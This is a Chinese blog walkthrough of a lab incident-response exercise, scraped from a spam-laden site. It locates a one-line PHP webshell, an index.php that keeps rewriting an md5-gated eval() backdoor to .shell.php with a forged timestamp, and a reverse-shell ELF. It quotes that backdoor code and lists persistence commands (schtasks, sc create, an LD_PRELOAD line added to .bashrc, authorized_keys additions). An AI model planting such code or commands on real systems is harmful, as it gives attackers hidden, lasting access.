当前位置: 首页 > wzjs >正文

网站开发大学是什么专业逆冬seo

网站开发大学是什么专业,逆冬seo,搜索附近的电子产品,wordpress 访问不了靶机排查目标: 1.web目录存在木马,请找到木马的密码提交 查看/var/www/html。 使用find命令查找 find ./ -type f -name "*.php | xargs grep "eval("查看到1.php里面存在无条件一句话木马。 2.服务器疑似存在不死马,请找…

靶机排查目标:

1.web目录存在木马,请找到木马的密码提交

查看/var/www/html。

使用find命令查找

find ./ -type f -name "*.php | xargs grep "eval("

查看到1.php里面存在无条件一句话木马。

2.服务器疑似存在不死马,请找到不死马的密码提交

什么是不死马?

一种通过修改系统配置、注入合法进程或利用漏洞实现自启动隐蔽运行的恶意程序,即使系统重启或杀毒软件扫描也难以清除。

  • 特点
    • 持久化:通过注册表、计划任务、系统服务等方式实现自启动。
    • 隐蔽性:伪装成系统进程、注入合法程序或隐藏文件。
    • 对抗检测:可能禁用安全软件、清除日志或动态更换进程名。

windows下常见的隐藏位置

注册表键

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

启动文件夹:

C:\Users\<用户名>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

系统服务

通过sc.exe或服务管理器(services.msc)创建恶意服务:

sc create "假服务名" binPath="恶意程序路径" start=auto

计划任务

使用schtasks创建定时任务:

schtasks /create /tn "伪装任务" /tr "恶意程序路径" /sc onstart /ru SYSTEM

进程注入:

  • 注入到explorer.exesvchost.exe等合法进程内存中,通过工具如Process Hollowing实现。

文件隐藏

  • 隐藏文件:通过attrib +h +s隐藏文件。
  • 系统目录
C:\Windows\System32
C:\Windows\Temp
C:\Users\<用户名>\AppData\Local\Temp

linux下常见隐藏位置

1) 自启动脚本
  • rc.local(需执行权限):
/etc/rc.local

cron计划任务

/etc/crontab
/var/spool/cron/<用户名>
/etc/cron.d/

systemd服务:

/etc/systemd/system/恶意服务.service
~/.config/systemd/user/
(2) 动态链接库注入
  • 修改LD_PRELOAD环境变量,劫持合法程序:
echo 'export LD_PRELOAD=/lib/恶意库.so' >> ~/.bashrc
(3) 隐藏进程/文件
  • 隐藏进程:通过libprocesshider等工具隐藏进程。
  • 隐藏文件
/tmp/.恶意文件(以点开头)
/dev/shm/(内存文件系统)
/usr/lib/.hidden/
(4) SSH后门
  • 修改authorized_keyssshd配置文件:
~/.ssh/authorized_keys  # 添加攻击者公钥
/usr/lib/ssh/ssh-xxx(替换ssh二进制文件)

防护手段

windows

工具

  • Autoruns(检查自启动项)
  • Process Explorer(分析进程树)
  • PowerShell命令:
Get-WmiObject Win32_StartupCommand | Select-Object Name, Command, Location
  • 日志
    检查事件查看器(eventvwr.msc)中的异常登录或服务启动记录。

linux的

  • 工具
    • systemctl list-unit-files --type=service # 列出所有服务及其状态
    • crontab -l(检查计划任务)
    • lsmod(查看内核模块)
lsof -i          # 查看异常网络连接
find / -type f -perm /4000  # 查找SUID可疑文件
root@ip-10-0-10-4:/var/www/html# cat index.php
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

file_put_contentsPHP 中用于将数据写入文件的函数,功能类似于依次调用 fopen()fwrite()fclose() 的组合,但更简洁高效

从这里可以看出来这里在创建木马文件,把木马文件放到.shell.php中并修改时间戳,掩盖修改。

这里不死马的密码就是那串md5值

3.不死马是通过哪个文件生成的,请提交文件名

从第二步中可以看出是由index.php生成的

4.黑客留下了木马文件,请找出黑客的服务器ip和端口提交

刚才查看网站根目录的时候发现了一个可疑文件。

运行。

发现没有权限。

使用命令

chmod +x ./'shell(1).elf'

+x是赋予这个文件执行的权限

执行之后使用netstat来查看我们的网络连接和监听端口情况。

netstat 命令

netstat 是一个网络工具,用于显示网络连接、路由表、接口统计信息、伪装连接和多播成员信息。

选项和参数

  • -a:显示所有连接中的端口,包括监听和非监听。
  • -n:以数字形式显示地址和端口号,而不是将其解析为主机名或服务名。
  • -t:显示 TCP 连接。
  • -l:显示监听状态的套接字。
  • -p:显示使用每个套接字的程序。

另外开一个窗口执行netstat命令查看连接情况。

用lsof也是可以的

lsof -i

发现了黑客的ip地址和端口情况。

http://www.dtcms.com/wzjs/46359.html

相关文章:

  • 一般网站的宽度是多少国家税务总局网
  • 找网站做网站做网站网站监测
  • 经典网站域名百度账号人工申诉
  • 海南最新通知今天重要消息百seo排名优化
  • 国家建设部官方网站赵宏彦h5制作
  • 网站在建设中是什么意思云南今日头条新闻
  • 网站制作和优化专注于seo顾问
  • 做网站公司项目的流程公司网页制作流程
  • 网站域名登录不了百度导航2023年最新版
  • 疫情防控措施调整常州网站优化
  • 做电话销售需要的网站seo专业培训需要多久
  • 深圳网站制作品牌祥奔科技产品推广活动策划方案
  • wordpress 站点地址 wordpress地址网站流量来源
  • 网页设计和网站建设的区别成都网络营销搜索推广
  • 电子商城网站开发 pdf百度推广登录入口电脑
  • 建设银行流水假的真伪查询网站关键词推广和定向推广
  • 某学校网站建设方案论文账户竞价托管哪里好
  • 使用tag的网站专业网络推广外包
  • 可以做彩票网站的工作室来宾seo
  • 建设工程规划许可证查询网站集合竞价口诀背熟6句
  • 做电影网站的资源从哪里换miy188coo免费入口
  • 动态网站开发案例实训总结6微博seo排名优化
  • 广州行业门户网站建设做一个电商平台大概需要多少钱
  • 动态网站设计都有什么属性百度2019旧版本下载
  • 高端网站定制设计公司模板建站平台
  • 网站开发建设价格附件自媒体十大平台
  • 公司做网站找谁公司做网站找谁网站推广计划书范文
  • 网页设计教程详细步骤南京seo域名
  • 金融网站建设多少钱百度指数怎么做
  • 网站项目报价单模板开封网站优化公司